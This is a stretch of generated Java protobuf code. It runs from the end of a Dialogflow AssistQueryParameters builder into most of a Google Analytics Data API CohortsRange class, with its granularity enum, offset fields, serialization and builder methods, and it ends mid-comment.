<pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public boolean containsDocumentsMetadataFilters(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } return internalGetDocumentsMetadataFilters().getMap().containsKey(key); } /** Use {@link #getDocumentsMetadataFiltersMap()} instead. */ @java.lang.Override @java.lang.Deprecated public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFilters() { return getDocumentsMetadataFiltersMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFiltersMap() { return internalGetDocumentsMetadataFilters().getMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public /* nullable */ java.lang.String getDocumentsMetadataFiltersOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); return map.containsKey(key) ? map.get(key) : defaultValue; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.lang.String getDocumentsMetadataFiltersOrThrow(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); if (!map.containsKey(key)) { throw new java.lang.IllegalArgumentException(); } return map.get(key); } public Builder clearDocumentsMetadataFilters() { bitField0_ = (bitField0_ & ~0x00000001); internalGetMutableDocumentsMetadataFilters().getMutableMap().clear(); return this; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ public Builder removeDocumentsMetadataFilters(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } internalGetMutableDocumentsMetadataFilters().getMutableMap().remove(key); return this; } /** Use alternate mutation accessors instead. */ @java.lang.Deprecated public java.util.Map<java.lang.String, java.lang.String> getMutableDocumentsMetadataFilters() { bitField0_ |= 0x00000001; return internalGetMutableDocumentsMetadataFilters().getMutableMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ public Builder putDocumentsMetadataFilters(java.lang.String key, java.lang.String value) { if (key == null) { throw new NullPointerException("map key"); } if (value == null) { throw new NullPointerException("map value"); } internalGetMutableDocumentsMetadataFilters().getMutableMap().put(key, value); bitField0_ |= 0x00000001; return this; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ public Builder putAllDocumentsMetadataFilters( java.util.Map<java.lang.String, java.lang.String> values) { internalGetMutableDocumentsMetadataFilters().getMutableMap().putAll(values); bitField0_ |= 0x00000001; return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.dialogflow.v2beta1.AssistQueryParameters) } // @@protoc_insertion_point(class_scope:google.cloud.dialogflow.v2beta1.AssistQueryParameters) private static final com.google.cloud.dialogflow.v2beta1.AssistQueryParameters DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.dialogflow.v2beta1.AssistQueryParameters(); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AssistQueryParameters> PARSER = new com.google.protobuf.AbstractParser<AssistQueryParameters>() { @java.lang.Override public AssistQueryParameters parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AssistQueryParameters> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AssistQueryParameters> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,816
java-analytics-data/proto-google-analytics-data-v1beta/src/main/java/com/google/analytics/data/v1beta/CohortsRange.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/analytics/data/v1beta/data.proto // Protobuf Java Version: 3.25.8 package com.google.analytics.data.v1beta; /** * * * <pre> * Configures the extended reporting date range for a cohort report. Specifies * an offset duration to follow the cohorts over. * </pre> * * Protobuf type {@code google.analytics.data.v1beta.CohortsRange} */ public final class CohortsRange extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.analytics.data.v1beta.CohortsRange) CohortsRangeOrBuilder { private static final long serialVersionUID = 0L; // Use CohortsRange.newBuilder() to construct. private CohortsRange(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CohortsRange() { granularity_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CohortsRange(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.analytics.data.v1beta.CohortsRange.class, com.google.analytics.data.v1beta.CohortsRange.Builder.class); } /** * * * <pre> * The granularity used to interpret the `startOffset` and `endOffset` for the * extended reporting date range for a cohort report. * </pre> * * Protobuf enum {@code google.analytics.data.v1beta.CohortsRange.Granularity} */ public enum Granularity implements com.google.protobuf.ProtocolMessageEnum { /** * * * <pre> * Should never be specified. * </pre> * * <code>GRANULARITY_UNSPECIFIED = 0;</code> */ GRANULARITY_UNSPECIFIED(0), /** * * * <pre> * Daily granularity. Commonly used if the cohort's `dateRange` is a single * day and the request contains `cohortNthDay`. * </pre> * * <code>DAILY = 1;</code> */ DAILY(1), /** * * * <pre> * Weekly granularity. Commonly used if the cohort's `dateRange` is a week * in duration (starting on Sunday and ending on Saturday) and the request * contains `cohortNthWeek`. * </pre> * * <code>WEEKLY = 2;</code> */ WEEKLY(2), /** * * * <pre> * Monthly granularity. Commonly used if the cohort's `dateRange` is a month * in duration and the request contains `cohortNthMonth`. * </pre> * * <code>MONTHLY = 3;</code> */ MONTHLY(3), UNRECOGNIZED(-1), ; /** * * * <pre> * Should never be specified. * </pre> * * <code>GRANULARITY_UNSPECIFIED = 0;</code> */ public static final int GRANULARITY_UNSPECIFIED_VALUE = 0; /** * * * <pre> * Daily granularity. Commonly used if the cohort's `dateRange` is a single * day and the request contains `cohortNthDay`. * </pre> * * <code>DAILY = 1;</code> */ public static final int DAILY_VALUE = 1; /** * * * <pre> * Weekly granularity. Commonly used if the cohort's `dateRange` is a week * in duration (starting on Sunday and ending on Saturday) and the request * contains `cohortNthWeek`. * </pre> * * <code>WEEKLY = 2;</code> */ public static final int WEEKLY_VALUE = 2; /** * * * <pre> * Monthly granularity. Commonly used if the cohort's `dateRange` is a month * in duration and the request contains `cohortNthMonth`. * </pre> * * <code>MONTHLY = 3;</code> */ public static final int MONTHLY_VALUE = 3; public final int getNumber() { if (this == UNRECOGNIZED) { throw new java.lang.IllegalArgumentException( "Can't get the number of an unknown enum value."); } return value; } /** * @param value The numeric wire value of the corresponding enum entry. * @return The enum associated with the given numeric wire value. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static Granularity valueOf(int value) { return forNumber(value); } /** * @param value The numeric wire value of the corresponding enum entry. * @return The enum associated with the given numeric wire value. */ public static Granularity forNumber(int value) { switch (value) { case 0: return GRANULARITY_UNSPECIFIED; case 1: return DAILY; case 2: return WEEKLY; case 3: return MONTHLY; default: return null; } } public static com.google.protobuf.Internal.EnumLiteMap<Granularity> internalGetValueMap() { return internalValueMap; } private static final com.google.protobuf.Internal.EnumLiteMap<Granularity> internalValueMap = new com.google.protobuf.Internal.EnumLiteMap<Granularity>() { public Granularity findValueByNumber(int number) { return Granularity.forNumber(number); } }; public final com.google.protobuf.Descriptors.EnumValueDescriptor getValueDescriptor() { if (this == UNRECOGNIZED) { throw new java.lang.IllegalStateException( "Can't get the descriptor of an unrecognized enum value."); } return getDescriptor().getValues().get(ordinal()); } public final com.google.protobuf.Descriptors.EnumDescriptor getDescriptorForType() { return getDescriptor(); } public static final com.google.protobuf.Descriptors.EnumDescriptor getDescriptor() { return com.google.analytics.data.v1beta.CohortsRange.getDescriptor().getEnumTypes().get(0); } private static final Granularity[] VALUES = values(); public static Granularity valueOf(com.google.protobuf.Descriptors.EnumValueDescriptor desc) { if (desc.getType() != getDescriptor()) { throw new java.lang.IllegalArgumentException("EnumValueDescriptor is not for this type."); } if (desc.getIndex() == -1) { return UNRECOGNIZED; } return VALUES[desc.getIndex()]; } private final int value; private Granularity(int value) { this.value = value; } // @@protoc_insertion_point(enum_scope:google.analytics.data.v1beta.CohortsRange.Granularity) } public static final int GRANULARITY_FIELD_NUMBER = 1; private int granularity_ = 0; /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return The enum numeric value on the wire for granularity. */ @java.lang.Override public int getGranularityValue() { return granularity_; } /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return The granularity. */ @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange.Granularity getGranularity() { com.google.analytics.data.v1beta.CohortsRange.Granularity result = com.google.analytics.data.v1beta.CohortsRange.Granularity.forNumber(granularity_); return result == null ? com.google.analytics.data.v1beta.CohortsRange.Granularity.UNRECOGNIZED : result; } public static final int START_OFFSET_FIELD_NUMBER = 2; private int startOffset_ = 0; /** * * * <pre> * `startOffset` specifies the start date of the extended reporting date range * for a cohort report. `startOffset` is commonly set to 0 so that reports * contain data from the acquisition of the cohort forward. * * If `granularity` is `DAILY`, the `startDate` of the extended reporting date * range is `startDate` of the cohort plus `startOffset` days. * * If `granularity` is `WEEKLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 7` days. * * If `granularity` is `MONTHLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 30` days. * </pre> * * <code>int32 start_offset = 2;</code> * * @return The startOffset. */ @java.lang.Override public int getStartOffset() { return startOffset_; } public static final int END_OFFSET_FIELD_NUMBER = 3; private int endOffset_ = 0; /** * * * <pre> * Required. `endOffset` specifies the end date of the extended reporting date * range for a cohort report. `endOffset` can be any positive integer but is * commonly set to 5 to 10 so that reports contain data on the cohort for the * next several granularity time periods. * * If `granularity` is `DAILY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset` days. * * If `granularity` is `WEEKLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 7` days. * * If `granularity` is `MONTHLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 30` days. * </pre> * * <code>int32 end_offset = 3;</code> * * @return The endOffset. */ @java.lang.Override public int getEndOffset() { return endOffset_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (granularity_ != com.google.analytics.data.v1beta.CohortsRange.Granularity.GRANULARITY_UNSPECIFIED .getNumber()) { output.writeEnum(1, granularity_); } if (startOffset_ != 0) { output.writeInt32(2, startOffset_); } if (endOffset_ != 0) { output.writeInt32(3, endOffset_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (granularity_ != com.google.analytics.data.v1beta.CohortsRange.Granularity.GRANULARITY_UNSPECIFIED .getNumber()) { size += com.google.protobuf.CodedOutputStream.computeEnumSize(1, granularity_); } if (startOffset_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, startOffset_); } if (endOffset_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(3, endOffset_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.analytics.data.v1beta.CohortsRange)) { return super.equals(obj); } com.google.analytics.data.v1beta.CohortsRange other = (com.google.analytics.data.v1beta.CohortsRange) obj; if (granularity_ != other.granularity_) return false; if (getStartOffset() != other.getStartOffset()) return false; if (getEndOffset() != other.getEndOffset()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + GRANULARITY_FIELD_NUMBER; hash = (53 * hash) + granularity_; hash = (37 * hash) + START_OFFSET_FIELD_NUMBER; hash = (53 * hash) + getStartOffset(); hash = (37 * hash) + END_OFFSET_FIELD_NUMBER; hash = (53 * hash) + getEndOffset(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.analytics.data.v1beta.CohortsRange parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.analytics.data.v1beta.CohortsRange parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.analytics.data.v1beta.CohortsRange parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.analytics.data.v1beta.CohortsRange parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.analytics.data.v1beta.CohortsRange prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Configures the extended reporting date range for a cohort report. Specifies * an offset duration to follow the cohorts over. * </pre> * * Protobuf type {@code google.analytics.data.v1beta.CohortsRange} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.analytics.data.v1beta.CohortsRange) com.google.analytics.data.v1beta.CohortsRangeOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.analytics.data.v1beta.CohortsRange.class, com.google.analytics.data.v1beta.CohortsRange.Builder.class); } // Construct using com.google.analytics.data.v1beta.CohortsRange.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; granularity_ = 0; startOffset_ = 0; endOffset_ = 0; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.analytics.data.v1beta.ReportingApiProto .internal_static_google_analytics_data_v1beta_CohortsRange_descriptor; } @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange getDefaultInstanceForType() { return com.google.analytics.data.v1beta.CohortsRange.getDefaultInstance(); } @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange build() { com.google.analytics.data.v1beta.CohortsRange result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange buildPartial() { com.google.analytics.data.v1beta.CohortsRange result = new com.google.analytics.data.v1beta.CohortsRange(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.analytics.data.v1beta.CohortsRange result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.granularity_ = granularity_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.startOffset_ = startOffset_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.endOffset_ = endOffset_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.analytics.data.v1beta.CohortsRange) { return mergeFrom((com.google.analytics.data.v1beta.CohortsRange) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.analytics.data.v1beta.CohortsRange other) { if (other == com.google.analytics.data.v1beta.CohortsRange.getDefaultInstance()) return this; if (other.granularity_ != 0) { setGranularityValue(other.getGranularityValue()); } if (other.getStartOffset() != 0) { setStartOffset(other.getStartOffset()); } if (other.getEndOffset() != 0) { setEndOffset(other.getEndOffset()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { granularity_ = input.readEnum(); bitField0_ |= 0x00000001; break; } // case 8 case 16: { startOffset_ = input.readInt32(); bitField0_ |= 0x00000002; break; } // case 16 case 24: { endOffset_ = input.readInt32(); bitField0_ |= 0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private int granularity_ = 0; /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return The enum numeric value on the wire for granularity. */ @java.lang.Override public int getGranularityValue() { return granularity_; } /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @param value The enum numeric value on the wire for granularity to set. * @return This builder for chaining. */ public Builder setGranularityValue(int value) { granularity_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return The granularity. */ @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange.Granularity getGranularity() { com.google.analytics.data.v1beta.CohortsRange.Granularity result = com.google.analytics.data.v1beta.CohortsRange.Granularity.forNumber(granularity_); return result == null ? com.google.analytics.data.v1beta.CohortsRange.Granularity.UNRECOGNIZED : result; } /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @param value The granularity to set. * @return This builder for chaining. */ public Builder setGranularity(com.google.analytics.data.v1beta.CohortsRange.Granularity value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000001; granularity_ = value.getNumber(); onChanged(); return this; } /** * * * <pre> * Required. The granularity used to interpret the `startOffset` and * `endOffset` for the extended reporting date range for a cohort report. * </pre> * * <code>.google.analytics.data.v1beta.CohortsRange.Granularity granularity = 1;</code> * * @return This builder for chaining. */ public Builder clearGranularity() { bitField0_ = (bitField0_ & ~0x00000001); granularity_ = 0; onChanged(); return this; } private int startOffset_; /** * * * <pre> * `startOffset` specifies the start date of the extended reporting date range * for a cohort report. `startOffset` is commonly set to 0 so that reports * contain data from the acquisition of the cohort forward. * * If `granularity` is `DAILY`, the `startDate` of the extended reporting date * range is `startDate` of the cohort plus `startOffset` days. * * If `granularity` is `WEEKLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 7` days. * * If `granularity` is `MONTHLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 30` days. * </pre> * * <code>int32 start_offset = 2;</code> * * @return The startOffset. */ @java.lang.Override public int getStartOffset() { return startOffset_; } /** * * * <pre> * `startOffset` specifies the start date of the extended reporting date range * for a cohort report. `startOffset` is commonly set to 0 so that reports * contain data from the acquisition of the cohort forward. * * If `granularity` is `DAILY`, the `startDate` of the extended reporting date * range is `startDate` of the cohort plus `startOffset` days. * * If `granularity` is `WEEKLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 7` days. * * If `granularity` is `MONTHLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 30` days. * </pre> * * <code>int32 start_offset = 2;</code> * * @param value The startOffset to set. * @return This builder for chaining. */ public Builder setStartOffset(int value) { startOffset_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * `startOffset` specifies the start date of the extended reporting date range * for a cohort report. `startOffset` is commonly set to 0 so that reports * contain data from the acquisition of the cohort forward. * * If `granularity` is `DAILY`, the `startDate` of the extended reporting date * range is `startDate` of the cohort plus `startOffset` days. * * If `granularity` is `WEEKLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 7` days. * * If `granularity` is `MONTHLY`, the `startDate` of the extended reporting * date range is `startDate` of the cohort plus `startOffset * 30` days. * </pre> * * <code>int32 start_offset = 2;</code> * * @return This builder for chaining. */ public Builder clearStartOffset() { bitField0_ = (bitField0_ & ~0x00000002); startOffset_ = 0; onChanged(); return this; } private int endOffset_; /** * * * <pre> * Required. `endOffset` specifies the end date of the extended reporting date * range for a cohort report. `endOffset` can be any positive integer but is * commonly set to 5 to 10 so that reports contain data on the cohort for the * next several granularity time periods. * * If `granularity` is `DAILY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset` days. * * If `granularity` is `WEEKLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 7` days. * * If `granularity` is `MONTHLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 30` days. * </pre> * * <code>int32 end_offset = 3;</code> * * @return The endOffset. */ @java.lang.Override public int getEndOffset() { return endOffset_; } /** * * * <pre> * Required. `endOffset` specifies the end date of the extended reporting date * range for a cohort report. `endOffset` can be any positive integer but is * commonly set to 5 to 10 so that reports contain data on the cohort for the 